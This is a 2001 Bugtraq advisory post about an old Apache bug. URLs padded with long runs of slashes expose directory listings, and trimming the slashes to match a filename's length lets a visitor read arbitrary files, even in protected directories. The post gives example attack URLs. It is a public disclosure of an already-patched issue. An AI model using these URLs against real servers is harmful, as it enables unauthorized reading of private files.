Bugtraq mailing list archives
Apache Artificially Long Slash Path Directory Listing Vulnerabili ty -- FILE READ ACCESS
From: Brian Dinello <brian.dinello () vigilantminds com>
Date: Thu, 26 Jul 2001 11:55:16 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache Artificially Long Slash Path Directory Listing Vulnerability BUGTRAQ ID 2503 I'm not really sure if this is a known issue, but here goes: Old news: As the vulnerability's description describes, any user with a web browser can obtain directory listing of the Apache http root directory, even if the directory contains an index.html file and is password protected. New news: You can access files/directories under the http root by subtracting the number of slashes from the appended url equal to the number of characters in the file or directory name you are attempting to access. Example: Standard Directory List: http://15.16.17.18//////////////////////////////////////////////////// //////////////// Download an Arbitrary file: http://15.16.17.18//////////////////////////////////////////////////// ////thisfile.txt Or In a Directory: http://15.16.17.18////////////////////////////////////////////////subd ir1/thisfile.txt I've made no attempt to contact The Apache Group to discuss this as it is the result of a known vulnerability and patches have already been released to fix vulnerable systems. Brian Dinello Security Consultant VigilantMinds, Inc. brian.dinello () vigilantminds com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBO2A9ma1dkgK5UcWTEQIa4wCfXK2NheBMvCb67CSOXBGpGoXEkfsAoNOC ZjyC05S8XddgUvLifLIIvx2o =Fz1o -----END PGP SIGNATURE-----
Current thread:
- Apache Artificially Long Slash Path Directory Listing Vulnerabili ty -- FILE READ ACCESS Brian Dinello (Jul 26)
- Re: Apache Artificially Long Slash Path Directory Listing Vulnerability -- FILE READ ACCESS Moorjani uday (Jul 27)
- Re: Apache Artificially Long Slash Path Directory Listing Vulnerabili ty -- FILE READ ACCESS Stephen Cope (Jul 28)